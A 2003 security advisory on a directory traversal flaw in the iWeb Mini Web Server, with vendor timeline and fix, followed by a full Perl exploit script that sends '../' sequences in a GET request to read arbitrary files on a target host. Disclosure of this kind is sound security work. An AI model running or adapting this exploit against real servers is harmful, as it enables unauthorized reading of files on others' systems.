SFAD03-001: iWeb Mini Web Server Remote Directory Traversal

2003-04-16T00:00:00
ID SECURITYVULNS:DOC:4396
Type securityvulns
Reporter Securityvulns
Modified 2003-04-16T00:00:00

Description

[=================================================================]

[=================================================================]

Title : iWeb Mini Web Server Remote Directory Traversal Risk : Moderate - Low Software : iWeb Mini Web Server Platforms : Windows NT/XP/9x Vendor URL : http://www.ashleybrown.co.uk/iweb/ Discovered by : subversive <subversive@linuxmail.org> Advisory ID : SFAD03-001

.....:[ Overview :

The iWeb Mini Web Server is a mini web server designed for use on Intranets and for testing websites in a realistic environment.

.....:[ Details :

iWeb does not correctly filter GET requests for ../ characters thereby allowing us to escape the webroot and remotely traverse the directory structure of the remote host.

.....:[ Vendor Status :

14/04/03 Initial Contact Made 15/04/03 Vendor Responded 15/04/03 Vendor Released Updated Version

.....:[ Solution :

Remove old iWeb application and download and install the updated version which can be found at:

http://ashleybrown.co.uk/downloads/iws2.exe

.....:[ Exploit - SF-iwsuk.pl :

!/usr/bin/perl -w

S e c u r i t y F r e a k s

www.securityfreaks.com

iWeb Mini Web Server Remote Directory Traversal

subversive[at]linuxmail.org - 15/04/2003

use IO::Socket;

if(!$ARGV[0]) { print <<"IWEBSUK";

S e c u r i t y F r e a k s www.securityfreaks.com


SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal


Usage: $0 <host> <file> <port>

IWEBSUK exit; }

else{ $host = $ARGV[0]; }

if(!$ARGV[2]) { $port = "80"; }

else { $port = $ARGV[2]; }

my $sock = new IO::Socket::INET ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, ); die "\nConnection to $host:$port failed\n" unless $sock;

print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n"; while(<$sock>) { print } close($sock); print("\n\n"); exit;

--


http://www.linuxmail.org/ Now with e-mail forwarding for only US$5.95/yr

Powered by Outblaze